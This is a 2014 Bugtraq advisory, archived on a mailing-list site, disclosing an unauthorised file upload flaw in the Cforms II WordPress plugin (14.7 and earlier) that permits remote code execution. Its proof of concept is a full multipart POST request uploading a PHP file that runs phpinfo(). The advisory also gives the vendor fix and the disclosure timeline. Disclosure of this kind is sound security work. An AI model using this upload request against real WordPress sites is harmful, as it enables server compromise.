lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201412292012.sBTKC9iQ014561@sf01web1.securityfocus.com>
Date: Mon, 29 Dec 2014 20:12:09 GMT
From: z.fedotkin@...osec.ru
To: bugtraq@...urityfocus.com
Subject: Remote Code Execution via Unauthorised File upload in Cforms 14.7

Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 
Advisory ID: -
Author: Zakhar Fedotkin
Affected Software: Wordpress Plugin Cforms II  14.x-14.7 (Release: 12th Nov 2014)
Vendor URL: https://wordpress.org/plugins/cforms2/
Vendor Status: fixed
CVE-ID: -

==========================
Vulnerability Description:
==========================

The Cforms 14.7 and before are vulnerable to unauthorised user file upload. It's affected contact forms thats was created without file upload box. File lib_nonajax.php accept files with all extensions, that could lead to remote code execution

==================
Technical Details:
==================

POC:
Request to the valid contact form looks like:
POST /wordpress/ HTTP/1.1
..
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------13530703071348311666826727318
Content-Length: 1747
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_1"
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_2"
test
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_3"
test@...t.com
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf2_field_4"
http://
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_uploadfile2[]"; filename="up.php"
Content-Type: text/php
<? phpinfo(); ?>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_working2"
<span>One%20moment%20please...</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_failure2"
<span>Please%20fill%20in%20all%20the%20required%20fields.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_codeerr2"
<span>Please%20double-check%20your%20verification%20code.</span>
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_customerr2"
yyy
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="cf_popup2"
nn
-----------------------------13530703071348311666826727318
Content-Disposition: form-data; name="sendbutton2"
1
-----------------------------13530703071348311666826727318--
The error is in lib_nonajax.php and default settings lib_nonajax.php allow to upload files to the default directory for versions below 14..6.3 it is cfroms plugin home directory. For version 14.6.3 and after it is wordpress upload directory. Default settings for contact form without upload field is None, so it's possible to upload *.php file.


=========
Solution:
=========

Update to the latest version

====================
Disclosure Timeline:
====================

15-Dec-2014 ? found the vulnerability
22-Dec-2014 - informed the developers
23-Dec-2014 - response by vendor
27-Dec-2014 ? fix by vendor
29-Dec-2014 - release date of this security advisory
29-Dec-2014 - post on Bugtraq

========
Credits:
========

Vulnerability found and advisory written by Zakhar Fedotkin.

===========
References:
===========

https://wordpress.org/plugins/cforms2/
http://infosec.ru

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ